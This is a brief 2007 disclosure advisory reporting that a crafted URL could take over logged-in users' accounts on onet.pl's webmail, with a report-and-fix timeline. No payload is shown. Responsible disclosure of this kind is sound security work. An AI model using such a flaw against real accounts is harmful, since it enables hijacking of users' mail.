+ onet.pl
Description:
Onet.pl is the most famous Polish web portal.
It is an interactive communication platform that runs an e-mail system (poczta.onet.pl) with millions of accounts.
It is possible to take over a user account of the mail service at http://poczta.onet.pl [and others in the *.onet.pl domain] when a logged-in user clicks on a specially crafted URL.
Timeline:
2007.03.04 bug discovered
2007.03.04 bug sent via email from http://pomoc.onet.pl/index.html?KAT=1148
2007.03.07 response via email from Abuse Onet
2007.03.30 it's fixed now (probably fixed earlier)
Original Advisory: http://kaneda.bohater.net/security/20070304-xss-onet.pl.php